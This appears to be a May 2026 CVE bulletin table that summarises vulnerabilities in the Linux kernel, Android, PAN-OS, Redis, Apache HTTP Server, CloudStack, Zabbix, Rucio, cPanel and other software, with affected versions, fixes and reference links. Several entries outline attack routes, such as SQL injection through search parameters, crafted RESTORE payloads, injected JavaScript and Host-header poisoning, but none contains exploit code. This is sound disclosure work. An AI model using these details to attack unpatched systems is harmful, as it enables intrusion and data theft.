| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/ras: Move ras data alloc before bad page check In the rare event if eeprom has only invalid address entries, allocation is skipped, this causes following NULL pointer issue [ 547.103445] BUG: kernel NULL pointer dereference, address: 0000000000000010 [ 547.118897] #PF: supervisor read access in kernel mode [ 547.130292] #PF: error_code(0x0000) - not-present page [ 547.141689] PGD 124757067 P4D 0 [ 547.148842] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 547.158504] CPU: 49 PID: 8167 Comm: cat Tainted: G OE 6.8.0-38-generic #38-Ubuntu [ 547.177998] Hardware name: Supermicro AS -8126GS-TNMR/H14DSG-OD, BIOS 1.7 09/12/2025 [ 547.195178] RIP: 0010:amdgpu_ras_sysfs_badpages_read+0x2f2/0x5d0 [amdgpu] [ 547.210375] Code: e8 63 78 82 c0 45 31 d2 45 3b 75 08 48 8b 45 a0 73 44 44 89 f1 48 8b 7d 88 48 89 ca 48 c1 e2 05 48 29 ca 49 8b 4d 00 48 01 d1 <48> 83 79 10 00 74 17 49 63 f2 48 8b 49 08 41 83 c2 01 48 8d 34 76 [ 547.252045] RSP: 0018:ffa0000067287ac0 EFLAGS: 00010246 [ 547.263636] RAX: ff11000167c28130 RBX: ff11000127600000 RCX: 0000000000000000 [ 547.279467] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ff11000125b1c800 [ 547.295298] RBP: ffa0000067287b50 R08: 0000000000000000 R09: 0000000000000000 [ 547.311129] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 [ 547.326959] R13: ff11000217b1de00 R14: 0000000000000000 R15: 0000000000000092 [ 547.342790] FS: 0000746e59d14740(0000) GS:ff11017dfda80000(0000) knlGS:0000000000000000 [ 547.360744] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 547.373489] CR2: 0000000000000010 CR3: 000000019585e001 CR4: 0000000000f71ef0 [ 547.389321] PKRU: 55555554 [ 547.395316] Call Trace: [ 547.400737] <TASK> [ 547.405386] ? show_regs+0x6d/0x80 [ 547.412929] ? __die+0x24/0x80 [ 547.419697] ? page_fault_oops+0x99/0x1b0 [ 547.428588] ? do_user_addr_fault+0x2ee/0x6b0 [ 547.438249] ? exc_page_fault+0x83/0x1b0 [ 547.446949] ? asm_exc_page_fault+0x27/0x30 [ 547.456225] ? amdgpu_ras_sysfs_badpages_read+0x2f2/0x5d0 [amdgpu] [ 547.470040] ? mas_wr_modify+0xcd/0x140 [ 547.478548] sysfs_kf_bin_read+0x63/0xb0 [ 547.487248] kernfs_file_read_iter+0xa1/0x190 [ 547.496909] kernfs_fop_read_iter+0x25/0x40 [ 547.506182] vfs_read+0x255/0x390 This also result in space left assigned to negative values. Moving data alloc call before bad page check resolves both the issue. | 2026-05-06 | not yet calculated | CVE-2025-71293 | https://git.kernel.org/stable/c/0b7f78caeffa51a1afa521c284e863ec3b5a36df https://git.kernel.org/stable/c/5c685235b60459381e959109b416a63db4d8dbac https://git.kernel.org/stable/c/bd68a1404b6fa2e7e9957b38ba22616faba43e75 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix NULL pointer issue buffer funcs If SDMA block not enabled, buffer_funcs will not initialize, fix the null pointer issue if buffer_funcs not initialized. | 2026-05-06 | not yet calculated | CVE-2025-71294 | https://git.kernel.org/stable/c/29fd416e0e08aa6d5a97fd313749d08d83de0826 https://git.kernel.org/stable/c/276028fd9b60bbcc68796d1124b6b58298f4ca8a https://git.kernel.org/stable/c/3e849a93bff40f0c88a8aafba062b1de0ec2797b https://git.kernel.org/stable/c/9877a865d62c9c3e0f4cc369dc9ca9f7f24f5ee9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/buffer: add alert in try_to_free_buffers() for folios without buffers try_to_free_buffers() can be called on folios with no buffers attached when filemap_release_folio() is invoked on a folio belonging to a mapping with AS_RELEASE_ALWAYS set but no release_folio operation defined. In such cases, folio_needs_release() returns true because of the AS_RELEASE_ALWAYS flag, but the folio has no private buffer data. This causes try_to_free_buffers() to call drop_buffers() on a folio with no buffers, leading to a null pointer dereference. Adding a check in try_to_free_buffers() to return early if the folio has no buffers attached, with WARN_ON_ONCE() to alert about the misconfiguration. This provides defensive hardening. | 2026-05-06 | not yet calculated | CVE-2025-71295 | https://git.kernel.org/stable/c/1b111a69a6e33a922622bf9870e4e63fb2b649c8 https://git.kernel.org/stable/c/c1b6227555c52781178132b7a06466711855795c https://git.kernel.org/stable/c/727e5140e0cf83b4ce6a11b89bb73bff5d96f8f3 https://git.kernel.org/stable/c/42c32d7571ccd8ef32351cac506f00b0fae99fd2 https://git.kernel.org/stable/c/c6246ca15999053d2632fbcc7b86e6eef7f077cb https://git.kernel.org/stable/c/b68f91ef3b3fe82ad78c417de71b675699a8467c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around purge Acquire and release the GEM object's reservation lock around calls to the object's purge operation. The tests use drm_gem_shmem_purge_locked(), which led to errors such as show below. [ 58.709128] WARNING: CPU: 1 PID: 1354 at drivers/gpu/drm/drm_gem_shmem_helper.c:515 drm_gem_shmem_purge_locked+0x51c/0x740 Only export the new helper drm_gem_shmem_purge() for Kunit tests. This is not an interface for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71296 | https://git.kernel.org/stable/c/cdf8bbbd9017adcfb91ad9a902198d4b507719a9 https://git.kernel.org/stable/c/8baeee2c1c0cdb3a8eac3b8f38156cce6ee1a69f https://git.kernel.org/stable/c/3f41307d589c2f25d556d47b165df808124cd0c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: 8822b: Avoid WARNING in rtw8822b_config_trx_mode() rtw8822b_set_antenna() can be called from userspace when the chip is powered off. In that case a WARNING is triggered in rtw8822b_config_trx_mode() because trying to read the RF registers when the chip is powered off returns an unexpected value. Call rtw8822b_config_trx_mode() in rtw8822b_set_antenna() only when the chip is powered on. ------------[ cut here ]------------ write RF mode table fail WARNING: CPU: 0 PID: 7183 at rtw8822b.c:824 rtw8822b_config_trx_mode.constprop.0+0x835/0x840 [rtw88_8822b] CPU: 0 UID: 0 PID: 7183 Comm: iw Tainted: G W OE 6.17.5-arch1-1 #1 PREEMPT(full) 01c39fc421df2af799dd5e9180b572af860b40c1 Tainted: [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: LENOVO 82KR/LNVNB161216, BIOS HBCN18WW 08/27/2021 RIP: 0010:rtw8822b_config_trx_mode.constprop.0+0x835/0x840 [rtw88_8822b] Call Trace: <TASK> rtw8822b_set_antenna+0x57/0x70 [rtw88_8822b 370206f42e5890d8d5f48eb358b759efa37c422b] rtw_ops_set_antenna+0x50/0x80 [rtw88_core 711c8fb4f686162be4625b1d0b8e8c6a5ac850fb] ieee80211_set_antenna+0x60/0x100 [mac80211 f1845d85d2ecacf3b71867635a050ece90486cf3] nl80211_set_wiphy+0x384/0xe00 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? netdev_run_todo+0x63/0x550 genl_family_rcv_msg_doit+0xfc/0x160 genl_rcv_msg+0x1aa/0x2b0 ? __pfx_nl80211_pre_doit+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_nl80211_set_wiphy+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_nl80211_post_doit+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_genl_rcv_msg+0x10/0x10 netlink_rcv_skb+0x59/0x110 genl_rcv+0x28/0x40 netlink_unicast+0x285/0x3c0 ? __alloc_skb+0xdb/0x1a0 netlink_sendmsg+0x20d/0x430 ____sys_sendmsg+0x39f/0x3d0 ? import_iovec+0x2f/0x40 ___sys_sendmsg+0x99/0xe0 ? refill_obj_stock+0x12e/0x240 __sys_sendmsg+0x8a/0xf0 do_syscall_64+0x81/0x970 ? do_syscall_64+0x81/0x970 ? ksys_read+0x73/0xf0 ? do_syscall_64+0x81/0x970 ? count_memcg_events+0xc2/0x190 ? handle_mm_fault+0x1d7/0x2d0 ? do_user_addr_fault+0x21a/0x690 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> ---[ end trace 0000000000000000 ]--- | 2026-05-08 | not yet calculated | CVE-2025-71297 | https://git.kernel.org/stable/c/7852ca1cc65ad43fb8b620e6a65d5cb15e4e4487 https://git.kernel.org/stable/c/a96d161cfdb11cd2c35d5e498b93431164823338 https://git.kernel.org/stable/c/0d0c2fb80ca4c284c397dd7546743a3b5fdf4020 https://git.kernel.org/stable/c/509becaee5680a39bde00c2c7d448dfeb39a8e05 https://git.kernel.org/stable/c/44510ff07b5198e4a835a3074b716cec8357695b https://git.kernel.org/stable/c/44d1f624bbdd2d60319374ba85f7195a28d00c90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around madvise Acquire and release the GEM object's reservation lock around calls to the object's madvide operation. The tests use drm_gem_shmem_madvise_locked(), which led to errors such as show below. [ 58.339389] WARNING: CPU: 1 PID: 1352 at drivers/gpu/drm/drm_gem_shmem_helper.c:499 drm_gem_shmem_madvise_locked+0xde/0x140 Only export the new helper drm_gem_shmem_madvise() for Kunit tests. This is not an interface for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71298 | https://git.kernel.org/stable/c/9cc77691b5fd615625955cedf726da57543088f1 https://git.kernel.org/stable/c/07cfcab370da06f26c273306571cbb0bfa3b9c52 https://git.kernel.org/stable/c/607d07d8cc0b835a8701259f08a03dc149b79b4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsing The recent refactoring of where runtime PM is enabled done in commit f1eb4e792bb1 ("spi: spi-cadence-quadspi: Enable pm runtime earlier to avoid imbalance") made the fact that when we do a pm_runtime_disable() in the error paths of probe() we can trigger a runtime disable which in turn results in duplicate clock disables. This is particularly likely to happen when there is missing or broken DT description for the flashes attached to the controller. Early on in the probe function we do a pm_runtime_get_noresume() since the probe function leaves the device in a powered up state but in the error path we can't assume that PM is enabled so we also manually disable everything, including clocks. This means that when runtime PM is active both it and the probe function release the same reference to the main clock for the IP, triggering warnings from the clock subsystem: [ 8.693719] clk:75:7 already disabled [ 8.693791] WARNING: CPU: 1 PID: 185 at /usr/src/kernel/drivers/clk/clk.c:1188 clk_core_disable+0xa0/0xb ... [ 8.694261] clk_core_disable+0xa0/0xb4 (P) [ 8.694272] clk_disable+0x38/0x60 [ 8.694283] cqspi_probe+0x7c8/0xc5c [spi_cadence_quadspi] [ 8.694309] platform_probe+0x5c/0xa4 Dealing with this issue properly is complicated by the fact that we don't know if runtime PM is active so can't tell if it will disable the clocks or not. We can, however, sidestep the issue for the flash descriptions by moving their parsing to when we parse the controller properties which also save us doing a bunch of setup which can never be used so let's do that. | 2026-05-08 | not yet calculated | CVE-2025-71299 | https://git.kernel.org/stable/c/08dca4c8099a41a9fa3be128a793387603f73a17 https://git.kernel.org/stable/c/dcaa104ad9c860a6dbd5797919e0ec0b1cd5a57a https://git.kernel.org/stable/c/9f0736a4e136a6eb61e0cf530ddc18ab6d816ba3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "arm64: zynqmp: Add an OP-TEE node to the device tree" This reverts commit 06d22ed6b6635b17551f386b50bb5aaff9b75fbe. OP-TEE logic in U-Boot automatically injects a reserved-memory node along with optee firmware node to kernel device tree. The injection logic is dependent on that there is no manually defined optee node. Having the node in zynqmp.dtsi effectively breaks OP-TEE's insertion of the reserved-memory node, causing memory access violations during runtime. | 2026-05-08 | not yet calculated | CVE-2025-71300 | https://git.kernel.org/stable/c/eece81eeda10eb42c687399fb5aa69977ae15664 https://git.kernel.org/stable/c/3983ef126e439900bbf419724a9759863c146660 https://git.kernel.org/stable/c/2a833c730d4e8d1cc10953270ce0f3a156145d81 https://git.kernel.org/stable/c/c197179990124f991fca220d97fac56779a02c6d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around vmap/vunmap Acquire and release the GEM object's reservation lock around vmap and vunmap operations. The tests use vmap_locked, which led to errors such as show below. [ 122.292030] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:390 drm_gem_shmem_vmap_locked+0x3a3/0x6f0 [ 122.468066] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:293 drm_gem_shmem_pin_locked+0x1fe/0x350 [ 122.563504] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:234 drm_gem_shmem_get_pages_locked+0x23c/0x370 [ 122.662248] WARNING: CPU: 2 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:452 drm_gem_shmem_vunmap_locked+0x101/0x330 Only export the new vmap/vunmap helpers for Kunit tests. These are not interfaces for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71301 | https://git.kernel.org/stable/c/6b953d92f2f29e74b125617c6f00300fa1bed97e https://git.kernel.org/stable/c/e7b7022f11d3cf281c726117478696b83681bf11 https://git.kernel.org/stable/c/cda83b099f117f2a28a77bf467af934cb39e49cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: fix for dma-fence safe access rules Commit 506aa8b02a8d6 ("dma-fence: Add safe access helpers and document the rules") details the dma-fence safe access rules. The most common culprit is that drm_sched_fence_get_timeline_name may race with group_free_queue. | 2026-05-08 | not yet calculated | CVE-2025-71302 | https://git.kernel.org/stable/c/ab8c0de60f16d7e0b162ccbbb35fcf1f277c97c2 https://git.kernel.org/stable/c/eae60933abd11df013876f647c9edbd35ce67615 https://git.kernel.org/stable/c/efe24898485c5c831e629d9c6fb9350c35cb576f |
| Google--Android | In adbd_tls_verify_cert of auth.cpp, there is a possible bypass of wireless ADB mutual authentication due to a logic error in the code. This could lead to remote (proximal/adjacent) code execution as the shell user with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-05-04 | not yet calculated | CVE-2026-0073 | https://source.android.com/docs/security/bulletin/2026/2026-05-01 |
| Palo Alto Networks--Cloud NGFW | A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. The risk of this issue is greatly reduced if you secure access to the User-ID™ Authentication Portal per the best practice guidelines https://knowledgebase.paloaltonetworks.com/KCSArticleDetail by restricting access to only trusted internal IP addresses. Prisma Access, Cloud NGFW and Panorama appliances are not impacted by this vulnerability. | 2026-05-06 | not yet calculated | CVE-2026-0300 | https://security.paloaltonetworks.com/CVE-2026-0300 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10724073; Issue ID: MSV-6296. | 2026-05-04 | not yet calculated | CVE-2026-20447 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10708513; Issue ID: MSV-6281. | 2026-05-04 | not yet calculated | CVE-2026-20448 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01760138; Issue ID: MSV-6148. | 2026-05-04 | not yet calculated | CVE-2026-20449 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01753620; Issue ID: MSV-6100. | 2026-05-04 | not yet calculated | CVE-2026-20450 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In slbc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10828685; Issue ID: MSV-6504. | 2026-05-04 | not yet calculated | CVE-2026-20451 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| JohnsonControls--AC2000 | Uncontrolled Search Path Element vulnerability in JohnsonControls AC2000 on Windows allows Leveraging/Manipulating Configuration File Search Paths. This issue affects AC2000: from 10.6 before release 10, from 11.0 before release 9, from 12 before release 3. | 2026-05-06 | not yet calculated | CVE-2026-21661 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories |
| redis--redis | Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command. If a blocked client is evicted during this flow, an authenticated attacker can trigger a use-after-free that may lead to remote code execution. This has been patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-23479 | https://github.com/redis/redis/security/advisories/GHSA-93m2-935m-8rj3 https://github.com/redis/redis/releases/tag/8.6.3 |
| redis--redis | Redis is an in-memory data structure store. In all versions of redis-server with Lua scripting, an authenticated attacker can exploit the master-replica synchronization mechanism to trigger a use-after-free on replicas where replica-read-only is disabled or can be disabled, which may lead to remote code execution. A workaround is to prevent users from executing Lua scripts or avoid using replicas where replica-read-only is disabled. This is patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-23631 | https://github.com/redis/redis/security/advisories/GHSA-8ghh-qpmp-7826 https://github.com/redis/redis/releases/tag/8.6.3 |
| Apache Software Foundation--Apache HTTP Server | Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol. This issue affects Apache HTTP Server: 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-23918 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Zabbix--Zabbix | An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip. | 2026-05-06 | not yet calculated | CVE-2026-23926 | https://support.zabbix.com/browse/ZBX-27758 |
| Zabbix--Zabbix | A user able to connect to Agent 2 can inject an Oracle TNS connection string via the 'service' parameter. This can lead to Agent 2 connecting to an attacker-controlled server and leaking Oracle database credentials if they are saved in a named session. | 2026-05-06 | not yet calculated | CVE-2026-23927 | https://support.zabbix.com/browse/ZBX-27759 |
| Zabbix--Zabbix | The Item history widget (in Zabbix 7.0+) or the Plain text widget (in Zabbix 6.0) can execute injected JavaScript when HTML display is enabled. This can allow an attacker to perform unauthorized actions depending on which user opens a dashboard containing these widgets. The malicious JavaScript would have to come from a monitored host controlled by the attacker. Note: the Item history widget is a replacement for the Plain text widget since Zabbix 7.0. | 2026-05-06 | not yet calculated | CVE-2026-23928 | https://support.zabbix.com/browse/ZBX-27760 |
| Apache Software Foundation--Apache HTTP Server | An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-24072 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache CloudStack | Account users are allowed by default to register templates to be downloaded directly to the primary storage for deploying instances using the KVM hypervisor. Due to missing file name sanitization, an attacker can register malicious templates to execute arbitrary code on the KVM hosts. This can result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of the KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2026-25077 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | Instances deployed via the Proxmox extension allow unauthorized access to instances belonging to other tenants. This issue affects Apache CloudStack: from 4.21.0.0 through 4.22.0.0. The Proxmox extension for CloudStack improperly uses a user-editable instance setting, proxmox_vmid, to associate CloudStack instances with Proxmox virtual machines. Because this value is not restricted or validated against tenant ownership and Proxmox VM IDs are predictable, a non-privileged attacker can modify the setting to reference a VM belonging to another account. This allows unauthorized cross-tenant access and enables full control over the targeted VM, including starting, stopping, and destroying the virtual machine. Users are recommended to upgrade to version 4.22.0.1, which fixes this issue. As a workaround for the existing installations, editing of the proxmox_vmid instance detail by users can be prevented by adding this detail name to the global configuration parameter - user.vm.denied.details. | 2026-05-08 | not yet calculated | CVE-2026-25199 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| redis--redis | Redis is an in-memory data structure store. In versions of redis-server up to 8.6.3, the RESTORE command does not properly validate serialized values. An authenticated attacker with permission to execute RESTORE can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This is patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-25243 | https://github.com/redis/redis/security/advisories/GHSA-c8h9-259x-jff4 https://github.com/redis/redis/releases/tag/8.6.3 |
| RedisTimeSeries--RedisTimeSeries | RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14. | 2026-05-05 | not yet calculated | CVE-2026-25588 | https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14 |
| RedisBloom--RedisBloom | RedisBloom is a probabilistic data structures module for Redis. In all versions of RedisBloom before 2.8.20, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisBloom module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This issue is fixed in version 2.8.20. | 2026-05-05 | not yet calculated | CVE-2026-25589 | https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-7862-34pw-44wv https://github.com/RedisBloom/RedisBloom/releases/tag/v2.8.20 |
| Open Notebook--Open Notebook | An improper input validation, together with an overly permissive default CORS configuration in Open Notebook v1.8.1 allows remote attacker to trick a legitimate user to alter or delete arbitrary database entries via specially crafted malicious URL. Depending on the deployment, data exfiltration is also possible. | 2026-05-07 | not yet calculated | CVE-2026-28201 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-5wj9-f8q5-8f9c |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server. If mod_proxy_ajp connects to a malicious AJP server this AJP server can send a malicious AJP message back to mod_proxy_ajp and cause it to write 4 attacker controlled bytes after the end of a heap based buffer. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-28780 | https://httpd.apache.org/security/vulnerabilities_24.html |
| rucio--rucio | A SQL injection vulnerability in `FilterEngine.create_sqla_query()` allows any authenticated Rucio user to execute arbitrary SQL against the backend database through the DID search endpoint (`GET /dids/<scope>/dids/search`). On Oracle deployments attacker-controlled filter keys and values are interpolated directly into `sqlalchemy.text()` via Python `.format()`, completely bypassing parameterization. This enables full database compromise including extraction of authentication tokens, password hashes, and all managed data identifiers. This affects versions 1.27.0 and later before 35.8.5, 38.5.5, 39.4.2, and 40.1.1. The vulnerability exists in `lib/rucio/core/did_meta_plugins/filter_engine.py` within the `create_sqla_query()` method. When the database dialect is Oracle, filter expressions for JSON metadata columns are constructed using `text()` with Python string formatting. Both `key` and `value` are attacker-controlled strings derived from HTTP query parameters. The `text()` function creates a raw SQL fragment - it does **not** escape or parameterize its contents. Any authenticated Rucio user can exploit this through the DID search API to execute arbitrary SQL against the backend database. This can expose all managed data identifiers and sensitive tables such as identities, tokens, accounts, rse_settings, and rules, and may allow modification of database contents. The issue affects Oracle deployments using the default json_meta plugin and does not affect PostgreSQL or MySQL deployments using that plugin. This vulnerability has been fixed in versions 35.8.5, 38.5.5, 39.4.2, and 40.1.1. | 2026-05-06 | not yet calculated | CVE-2026-29080 | https://github.com/rucio/rucio/security/advisories/GHSA-vjr5-c9qv-hgm3 |
| rucio--rucio | ### Summary A SQL injection vulnerability exists in Rucio versions 1.30.0 and later before 35.8.5, 38.5.5, 39.4.2, and 40.1.1, in `FilterEngine.create_postgres_query()`. This allows any authenticated Rucio user to execute arbitrary SQL against the PostgreSQL metadata database through the DID search endpoint (`GET /dids/<scope>/dids/search`). When the `postgres_meta` metadata plugin is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL strings via Python `.format()`, then passed to `psycopg3`'s `sql.SQL()` which treats the string as trusted SQL syntax. Depending on the database privileges assigned to the service account, exploitation can expose sensitive tables, modify or delete metadata, access server-side files, or achieve code execution through PostgreSQL features such as COPY ... FROM PROGRAM. This issue affects deployments that explicitly use the postgres_meta metadata plugin. This vulnerability has been fixed in versions 35.8.5, 38.5.5, 39.4.2, and 40.1.1. | 2026-05-06 | not yet calculated | CVE-2026-29090 | https://github.com/rucio/rucio/security/advisories/GHSA-6j7p-qjhg-9947 |
| Apache Software Foundation--Apache HTTP Server | Allocation of Resources Without Limits or Throttling vulnerability in Apache HTTP Server's mod_md via OCSP response data. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-29168 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | A NULL pointer dereference in mod_dav_lock in Apache HTTP Server 2.4.66 and earlier may allow an attacker to crash the server with a malicious request.mod_dav_lock is not used internally by mod_dav or mod_dav_fs. The only known use-case for mod_dav_lock was mod_dav_svn from Apache Subversion earlier than version 1.2.0. Users are recommended to upgrade to version 2.4.66, which fixes this issue, or remove mod_dav_lock. | 2026-05-04 | not yet calculated | CVE-2026-29169 | https://httpd.apache.org/security/vulnerabilities_24.html |
| phpBB--phpBB | phpBB before 3.3.16 is vulnerable to Host Header Injection that can lead to password rest link poisoning. When force_server_vars is disabled, the servers hostname may be extracted from the HTTP Host header which is used to generate the password reset link URL. An attacker who can manipulate the Host header (e.g. through misconfigured host setup or missing header validation by the webserver) can cause password reset emails to contain a link pointing to an attacker-controlled domain, potentially leading to account takeover. | 2026-05-04 | not yet calculated | CVE-2026-29199 | https://hackerone.com/reports/3543246 |
| WebPros--Comet Backup | A critical IDOR vulnerability has been discovered in Comet Backup affecting all versions from 20.11.0 to 26.1.1 and 26.2.1. The vulnerability allows a tenant administrator to impersonate any end-user account of other tenants on the same server via a vulnerable API call. | 2026-05-04 | not yet calculated | CVE-2026-29200 | https://support.cometbackup.com/hc/en-us/articles/40090945484823--CVE-2026-29200-%D0%A1ritical-IDOR-vulnerability-in-Comet-Backup |
| WebPros--cPanel | Insufficient input validation of the feature file name in `feature::LOADFEATUREFILE` adminbin call can cause arbitrary file read when a relative file path is passed. | 2026-05-08 | not yet calculated | CVE-2026-29201 | https://support.cpanel.net/hc/en-us/articles/40311033698327-Security-CVE-2026-29201-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| WebPros--cPanel | Insufficient input validation of the `plugin` parameter of the `create_user` plugin allows arbitrary Perl code execution on behalf of the already authenticated account's system user. | 2026-05-08 | not yet calculated | CVE-2026-29202 | https://support.cpanel.net/hc/en-us/articles/40311426610327-Security-CVE-2026-29202-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| WebPros--cPanel | A chmod call in the cPanel Nova plugin's Cpanel::Nova::Connector follows symlinks, allowing setting root permissions on arbitrary system files or directories. That can cause DoS or local privilege escalation when an authenticated cPanel user places a symlink at a user-controlled legacy Nova path under their home directory. | 2026-05-08 | not yet calculated | CVE-2026-29203 | https://support.cpanel.net/hc/en-us/articles/40311543760407-Security-CVE-2026-29203-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| n/a--nanoMODBUS | nanoMODBUS through v1.22.0 has a stack-based buffer overflow in recv_read_registers_res() in nanomodbus.c. When a client calls nmbs_read_holding_registers() or nmbs_read_input_registers(), the library writes register data from the server response to the caller-provided buffer based on the response's byte_count field before validating that byte_count matches the requested quantity. A malicious Modbus TCP server can send a response with byte_count=250 (125 registers) regardless of the requested quantity, causing up to 248 bytes of attacker-controlled data to overflow the buffer, potentially allowing remote code execution. | 2026-05-08 | not yet calculated | CVE-2026-29972 | https://github.com/debevv/nanoMODBUS https://github.com/debevv/nanoMODBUS/blob/master/nanomodbus.c#L580-L615 https://gist.github.com/dwilliams27/a4e26fe747c8561d608f7549804bd85f |
| n/a-- kosma minmea 0.3.0 | An issue was discovered in kosma minmea 0.3.0. The minmea_scan functions format specifier copies NMEA field data to a caller-provided buffer without a size parameter. Applications using minmea_scan on untrusted input are vulnerable to a stack buffer overflow. | 2026-05-08 | not yet calculated | CVE-2026-29974 | https://github.com/kosma/minmea/blob/master/minmea.c#L231-L240 https://gist.github.com/dwilliams27/6d4d8077b970f35e1a921c897ce13852 |
